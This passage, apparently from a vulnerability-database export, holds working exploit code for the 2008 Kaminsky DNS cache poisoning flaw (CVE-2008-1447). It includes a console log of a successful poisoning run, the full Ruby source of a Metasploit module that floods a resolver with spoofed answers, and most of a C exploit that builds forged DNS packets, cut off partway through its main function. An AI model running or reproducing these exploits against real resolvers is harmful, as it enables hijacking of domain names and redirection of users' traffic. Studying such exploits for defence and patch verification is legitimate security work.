ADDRESS: A.B.C.D PORT: 48178\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\n\r\nmsf auxiliary(bailiwicked_host) > set SRCPORT 0\r\nSRCPORT => 0\r\n\r\nmsf auxiliary(bailiwicked_host) > run\r\n[*] Switching to target port 48178 based on Metasploit service\r\n[*] Targeting 
nameserver A.B.C.D\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got answer with 2 answers, 0 authorities\r\n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.\r\n[*] Querying recon nameserver for address of ns89.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45\r\n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....\r\n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.\r\n[*] Querying recon nameserver for address of ns90.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45\r\n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....\r\n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject a poison record for pwned.example.com. 
into A.B.C.D:48178...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary(bailiwicked_host) > \r\n\r\nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D\r\n[*] exec: nslookup pwned.example.com A.B.C.D\r\n\r\nServer: A.B.C.D\r\nAddress: A.B.C.D#53\r\n\r\nNon-authoritative answer:\r\nName: pwned.example.com\r\nAddress: 1.3.3.7\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary\r\n\r\n\tinclude Exploit::Remote::Ip\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'DNS BailiWicked Host Attack',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \r\n\t\t\t\tDan Kaminsky found and disclosed ~Jul 2008. 
This exploit caches a single\r\n\t\t\t\tmalicious host entry into the target nameserver by sending random sub-domain\r\n\t\t\t\tqueries to the target DNS server coupled with spoofed replies to those\r\n\t\t\t\tqueries from the authoritative nameservers for the domain which contain a\r\n\t\t\t\tmalicious host entry for the hostname to be poisoned in the authority and\r\n\t\t\t\tadditional records sections. Eventually, a guessed ID will match and the\r\n\t\t\t\tspoofed packet will get accepted, and due to the additional hostname entry\r\n\t\t\t\tbeing within bailiwick constraints of the original request the malicious host\r\n\t\t\t\tentry will get cached.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'I)ruid', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 5585 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t["BIND", \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\r\n\t\t\t))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),\r\n\t\t\t\t\tOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),\r\n\t\t\t\t\tOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),\r\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\r\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\r\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]),\r\n\t\t\t\t], self.class)\r\n\t\t\t\t\t\r\n\tend\r\n\t\r\n\tdef auxiliary_commands\r\n\t\treturn { 
"check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n\tend\r\n\r\n\tdef cmd_check(*args)\r\n\t\ttarg = args[0] || rhost()\r\n\t\tif(not (targ and targ.length > 0))\r\n\t\t\tprint_status("usage: check [dns-server]")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status("Using the Metasploit service to verify exploitability...")\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => targ,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\t\t\r\n\r\n\t\trandom = false\r\n\t\tports = []\r\n\t\tlport = nil\r\n\t\t\r\n\t\t1.upto(5) do |i|\r\n\t\t\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\r\n\t\t\t\t\t\tprint_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")\r\n\t\t\t\t\t\tt_port = t_port.to_i\r\n\t\t\t\t\t\tif(lport and lport != t_port)\r\n\t\t\t\t\t\t\trandom = true\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\t\tlport = t_port\r\n\t\t\t\t\t\tports << t_port\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\t\t\r\n\t\tsrv_sock.close\r\n\t\t\r\n\t\tif(ports.length < 5)\r\n\t\t\tprint_status("UNKNOWN: This server did not reply to our vulnerability check requests")\r\n\t\t\treturn\r\n\t\tend\r\n\t\t\r\n\t\tif(random)\r\n\t\t\tprint_status("PASS: This server does not use a static source port. 
Ports: #{ports.join(", ")}")\r\n\t\t\tprint_status(" This server may still be exploitable, but not by this tool.")\r\n\t\telse\r\n\t\t\tprint_status("FAIL: This server uses static source ports and is vulnerable to poisoning")\r\n\t\tend\r\n\tend\r\n\t\t\r\n\tdef run\r\n\t\ttarget = rhost()\r\n\t\tsource = Rex::Socket.source_address(target)\r\n\t\tsport = datastore['SRCPORT']\r\n\t\thostname = datastore['HOSTNAME'] + '.'\r\n\t\taddress = datastore['NEWADDR']\r\n\t\trecons = datastore['RECONS']\r\n\t\txids = datastore['XIDS'].to_i\r\n\t\tttl = datastore['TTL'].to_i\r\n\t\txidbase = rand(4)+2*10000\r\n\r\n\t\tdomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0]\r\n\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => target,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\r\n\r\n\t\t# Get the source port via the metasploit service if it's not set\r\n\t\tif sport.to_i == 0\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\t\t\t\t\t\tsport = t_port.to_i\r\n\r\n\t\t\t\t\t\tprint_status("Switching to target port #{sport} based on Metasploit service")\r\n\t\t\t\t\t\tif target != t_addr\r\n\t\t\t\t\t\t\tprint_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Verify its not already cached\r\n\t\tbegin\r\n\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\tquery.add_question(hostname, 
Resolv::DNS::Resource::IN::A)\r\n\t\t\tquery.rd = 0\r\n\r\n\t\t\tbegin\r\n\t\t\t\tcached = false\r\n\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\t\t\t\t\t\tif((name.to_s + ".") == hostname and data.address.to_s == address)\r\n\t\t\t\t\t\t\tt = Time.now + ttl\r\n\t\t\t\t\t\t\tprint_status("Failure: This hostname is already in the target cache: #{name} == #{address}")\r\n\t\t\t\t\t\t\tprint_status(" Cache entry expires on #{t.to_s}... sleeping.")\r\n\t\t\t\t\t\t\tcached = true\r\n\t\t\t\t\t\t\tsleep ttl\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend until not cached\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Exception => e\r\n\t\t\tprint_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\tend\r\n\r\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\r\n\r\n\t\tprint_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}"\r\n\r\n\t\t# Look up the nameservers for the domain\r\n\t\tprint_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\r\n\t\t#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"\r\n\r\n\t\tbarbs = [] # storage for nameservers\r\n\t\tanswer0.answer.each do |rr0|\r\n\t\t\tprint_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n\t\t\tif rr0.type == 'NS'\r\n\t\t\t\tprint_status " Querying recon nameserver for address of #{rr0.nsdname}..."\r\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\r\n\t\t\t\t#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"\r\n\t\t\t\tanswer1.answer.each do 
|rr1|\r\n\t\t\t\t\tprint_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \r\n\t\t\t\t\tprint_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."\r\n\t\t\t\t\tanswer2 = res2.send(domain)\r\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\r\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n\t\t\t\t\t\tbarbs << nsrec\r\n\t\t\t\t\t\tprint_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\r\n\t\tif barbs.length == 0\r\n\t\t\tprint_status( "No DNS servers found.")\r\n\t\t\tsrv_sock.close\r\n\t\t\tdisconnect_ip\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\r\n\t\tqueries = 0\r\n\t\tresponses = 0\r\n\r\n\t\tconnect_ip if not ip_sock\r\n\r\n\t\tprint_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...")\r\n\r\n\t\twhile true\r\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' 
+ domain # randomize the hostname\r\n\r\n\t\t\t# Send spoofed query\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\treq.id = rand(2**16)\r\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n\t\t\treq.rd = 1\r\n\r\n\t\t\tbuff = (\r\n\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\r\n\t\t\t\t\t:src => source,\r\n\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t:proto => 17\r\n\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\r\n\t\t\t\t\t:dport => 53\r\n\t\t\t\t)/req.encode\r\n\t\t\t).to_net\r\n\t\t\tip_sock.sendto(buff, target)\r\n\t\t\tqueries += 1\r\n\t\t\t\r\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n\t\t\treq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n\t\t\treq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\r\n\t\t\treq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n\t\t\treq.qr = 1\r\n\t\t\treq.ra = 1\r\n\r\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\r\n\t\t\t\treq.id = id\r\n\t\t\t\tbarbs.each do |barb|\r\n\t\t\t\t\tbuff = (\r\n\t\t\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\r\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\r\n\t\t\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t\t\t:proto => 17\r\n\t\t\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t\t\t:sport => 53,\r\n\t\t\t\t\t\t\t:dport => sport.to_i\r\n\t\t\t\t\t\t)/req.encode\r\n\t\t\t\t\t).to_net\r\n\t\t\t\t\tip_sock.sendto(buff, target)\r\n\t\t\t\t\tresponses += 1\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\t# status update\r\n\t\t\tif queries % 1000 == 0\r\n\t\t\t\tprint_status("Sent #{queries} queries and #{responses} spoofed responses...")\r\n\t\t\tend\r\n\r\n\t\t\t# every so often, check and see if the target is poisoned...\r\n\t\t\tif queries % 250 == 0 \r\n\t\t\t\tbegin\r\n\t\t\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\t\t\tquery.add_question(hostname, 
Resolv::DNS::Resource::IN::A)\r\n\t\t\t\t\tquery.rd = 0\r\n\t\r\n\t\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\t\t\t\t\t\t\tif((name.to_s + ".") == hostname and data.address.to_s == address)\r\n\t\t\t\t\t\t\t\tprint_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")\r\n\t\t\t\t\t\t\t\tdisconnect_ip\r\n\t\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\t\tend\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\trescue ::Interrupt\r\n\t\t\t\t\traise $!\r\n\t\t\t\trescue ::Exception => e\r\n\t\t\t\t\tprint_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\nend\t\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9165"}, {"lastseen": "2017-11-19T21:39:40", "description": "No description provided by source.", "published": "2008-07-26T00:00:00", "type": "seebug", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9178", "id": "SSV:9178", "sourceData": "\n /*\r\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\r\n *\r\n * Compilation:\r\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\r\n *\r\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\r\n *\r\n * Author: marc.bevand at rapid7 dot com\r\n */\r\n\r\n#define _BSD_SOURCE\r\n\r\n#include <sys/types.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <math.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n#include <dumbnet.h>\r\n\r\n#define DNSF_RESPONSE (1<<15)\r\n#define 
DNSF_AUTHORITATIVE (1<<10)\r\n#define DNSF_REC_DESIRED (1<<8)\r\n#define DNSF_REC_AVAILABLE (1<<7)\r\n\r\n#define TYPE_A 0x1\r\n#define TYPE_NS 0x2\r\n#define CLASS_IN 0x1\r\n\r\nstruct dns_pkt\r\n{\r\n uint16_t txid;\r\n uint16_t flags;\r\n uint16_t nr_quest;\r\n uint16_t nr_ans;\r\n uint16_t nr_auth;\r\n uint16_t nr_add;\r\n} __attribute__ ((__packed__));\r\n\r\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\r\n{\r\n unsigned bufi, i, j;\r\n bufi = i = j = 0;\r\n while (name[i])\r\n {\r\n if (name[i] == '.')\r\n {\r\n if (bufi + 1 + (i - j) > size)\r\n fprintf(stderr, "format_domain overflow\\n"), exit(1);\r\n buf[bufi++] = i - j;\r\n memcpy(buf + bufi, name + j, i - j);\r\n bufi += i - j;\r\n j = i + 1;\r\n }\r\n i++;\r\n }\r\n if (bufi + 1 + 2 + 2 > size)\r\n fprintf(stderr, "format_domain overflow\\n"), exit(1);\r\n buf[bufi++] = 0;\r\n *len = bufi;\r\n}\r\n\r\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\r\n{\r\n uint16_t tmp;\r\n // name\r\n format_domain(buf, size, len, name);\r\n // type\r\n tmp = htons(type);\r\n memcpy(buf + *len, &tmp, sizeof (tmp));\r\n *len += sizeof (tmp);\r\n // class\r\n tmp = htons(class);\r\n memcpy(buf + *len, &tmp, sizeof (tmp));\r\n *len += sizeof (tmp);\r\n}\r\n\r\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\r\n{\r\n format_qr(buf, size, len, name, type, class);\r\n // ttl\r\n ttl = htonl(ttl);\r\n memcpy(buf + *len, &ttl, sizeof (ttl));\r\n *len += sizeof (ttl);\r\n // data length + data\r\n uint16_t dlen;\r\n struct addr addr;\r\n switch (type)\r\n {\r\n case TYPE_A:\r\n dlen = sizeof (addr.addr_ip);\r\n break;\r\n case TYPE_NS:\r\n dlen = strlen(data) + 1;\r\n break;\r\n default:\r\n fprintf(stderr, "format_rr: unknown type %02x", type);\r\n exit(1);\r\n }\r\n dlen = htons(dlen);\r\n memcpy(buf + *len, &dlen, sizeof (dlen));\r\n *len += 
sizeof (dlen);\r\n // data\r\n unsigned len2;\r\n switch (type)\r\n {\r\n case TYPE_A:\r\n if (addr_aton(data, &addr) < 0)\r\n fprintf(stderr, "invalid destination IP: %s", data), exit(1);\r\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\r\n *len += sizeof (addr.addr_ip);\r\n break;\r\n case TYPE_NS:\r\n format_domain(buf + *len, size - *len, &len2, data);\r\n *len += len2;\r\n break;\r\n default:\r\n fprintf(stderr, "format_rr: unknown type %02x", type);\r\n exit(1);\r\n }\r\n}\r\n\r\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\r\n{\r\n u_char *out = buf;\r\n struct dns_pkt p = {\r\n .txid = htons(txid),\r\n .flags = htons(flags),\r\n .nr_quest = htons(1),\r\n .nr_ans = htons(0),\r\n .nr_auth = htons(0),\r\n .nr_add = htons(0),\r\n };\r\n u_char qr[256];\r\n unsigned l;\r\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\r\n if (sizeof (p) + l > size)\r\n fprintf(stderr, "dns_query overflow"), exit(1);\r\n memcpy(out, &p, sizeof (p));\r\n out += sizeof (p);\r\n memcpy(out, qr, l);\r\n out += l;\r\n *len = sizeof (p) + l;\r\n}\r\n\r\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\r\n uint16_t txid, uint16_t flags,\r\n const char *q_name, const char *q_ip,\r\n const char *domain, const char *auth_name, const char *auth_ip)\r\n{\r\n u_char *out = buf;\r\n u_char *end = buf + size;\r\n u_char rec[256];\r\n unsigned l_rec;\r\n uint32_t ttl = 24*3600;\r\n struct dns_pkt p = {\r\n .txid = htons(txid),\r\n .flags = htons(flags),\r\n .nr_quest = htons(1),\r\n .nr_ans = htons(1),\r\n .nr_auth = htons(1),\r\n .nr_add = htons(1),\r\n };\r\n (void)domain;\r\n *len = 0;\r\n if (out + *len + sizeof (p) > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\r\n // queries\r\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), 
exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n // answers\r\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\r\n ttl, q_ip);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n // authoritative nameservers\r\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\r\n ttl, auth_name);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n // additional records\r\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\r\n ttl, auth_ip);\r\n if (out + *len + l_rec > end)\r\n fprintf(stderr, "dns_response overflow"), exit(1);\r\n memcpy(out + *len, rec, l_rec); *len += l_rec;\r\n}\r\n\r\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\r\n{\r\n unsigned len = 0;\r\n // ip\r\n struct ip_hdr *ip = (struct ip_hdr *)buf;\r\n ip->ip_hl = 5;\r\n ip->ip_v = 4;\r\n ip->ip_tos = 0;\r\n ip->ip_id = rand() & 0xffff;\r\n ip->ip_off = 0;\r\n ip->ip_ttl = IP_TTL_MAX;\r\n ip->ip_p = 17; // udp\r\n ip->ip_sum = 0;\r\n struct addr addr;\r\n if (addr_aton(srcip, &addr) < 0)\r\n fprintf(stderr, "invalid source IP: %s", srcip), exit(1);\r\n ip->ip_src = addr.addr_ip;\r\n if (addr_aton(dstip, &addr) < 0)\r\n fprintf(stderr, "invalid destination IP: %s", dstip), exit(1);\r\n ip->ip_dst = addr.addr_ip;\r\n // udp\r\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\r\n udp->uh_sport = htons(1234);\r\n udp->uh_dport = htons(53);\r\n // dns\r\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\r\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\r\n rand(), DNSF_REC_DESIRED, name);\r\n // udp len\r\n len += UDP_HDR_LEN;\r\n udp->uh_ulen = htons(len);\r\n // ip len & cksum\r\n len += IP_HDR_LEN;\r\n ip->ip_len = htons(len);\r\n ip_checksum(buf, len);\r\n return len;\r\n}\r\n\r\nunsigned build_response(u_char 
*buf, const char *srcip, const char *dstip,\r\n uint16_t port_resolver, uint16_t txid,\r\n const char *q_name, const char *q_ip,\r\n const char *domain, const char *auth_name, const char *auth_ip)\r\n{\r\n unsigned len = 0;\r\n // ip\r\n struct ip_hdr *ip = (struct ip_hdr *)buf;\r\n ip->ip_hl = 5;\r\n ip->ip_v = 4;\r\n ip->ip_tos = 0;\r\n ip->ip_id = rand() & 0xffff;\r\n ip->ip_off = 0;\r\n ip->ip_ttl = IP_TTL_MAX;\r\n ip->ip_p = 17; // udp\r\n ip->ip_sum = 0;\r\n struct addr addr;\r\n if (addr_aton(srcip, &addr) < 0)\r\n fprintf(stderr, "invalid source IP: %s", srcip), exit(1);\r\n ip->ip_src = addr.addr_ip;\r\n if (addr_aton(dstip, &addr) < 0)\r\n fprintf(stderr, "invalid destination IP: %s", dstip), exit(1);\r\n ip->ip_dst = addr.addr_ip;\r\n // udp\r\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\r\n udp->uh_sport = htons(53);\r\n udp->uh_dport = htons(port_resolver);\r\n // dns\r\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\r\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\r\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\r\n q_name, q_ip, domain, auth_name, auth_ip);\r\n // udp len\r\n len += UDP_HDR_LEN;\r\n udp->uh_ulen = htons(len);\r\n // ip len & cksum\r\n len += IP_HDR_LEN;\r\n ip->ip_len = htons(len);\r\n ip_checksum(buf, len);\r\n return len;\r\n}\r\n\r\nvoid usage(char *name)\r\n{\r\n fprintf(stderr, "Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> "\r\n "<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n"\r\n " <ip-querier> Source IP used when sending queries for random hostnames\\n"\r\n " (typically your IP)\\n"\r\n " <ip-resolver> Target DNS resolver to attack\\n"\r\n " <ip-authoritative> One of the authoritative DNS servers for <domain>\\n"\r\n " <port-resolver> Source port used by the resolver when forwarding queries\\n"\r\n " <subhost> Poison the cache with the A record <subhost>.<domain>\\n"\r\n " <domain> Domain name, see <subhost>.\\n"\r\n " <any-ip> IP of your choice to be 
associated to <subhost>.<domain>\\n"\r\n " <attempts> Number of poisoning attemps, more attempts increase the\\n"\r\n " chance of successful poisoning, but also the attack time\\n"\r\n " <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n"\r\n " increase the chance of successful poisoning but, but also\\n"\r\n " the rate of packet loss\\n"\r\n "Example:\\n"\r\n " $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n"\r\n "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n"\r\n "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n"\r\n "this example (8192 attempts and 16 replies/attempt) is 86%%\\n"\r\n "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n"\r\n "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n"\r\n "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n"\r\n "100 attempts/sec).\\n",\r\n name, name);\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n if (argc != 10)\r\n usage(argv[0]), exit(1);\r\n const char *querier = argv[1];\r\n const char *ip_resolver = argv[2];\r\n const char *ip_authoritative = argv[3];\r\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\r\n const char *subhost = argv[5];\r\n const char *domain = argv[6];\r\n const char *anyip = argv[7];\r\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\r\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\r\n if (domain[strlen(domain) - 1 ] != '.')\r\n fprintf(stderr, "domain must end with dot(.): %s\\n", domain), 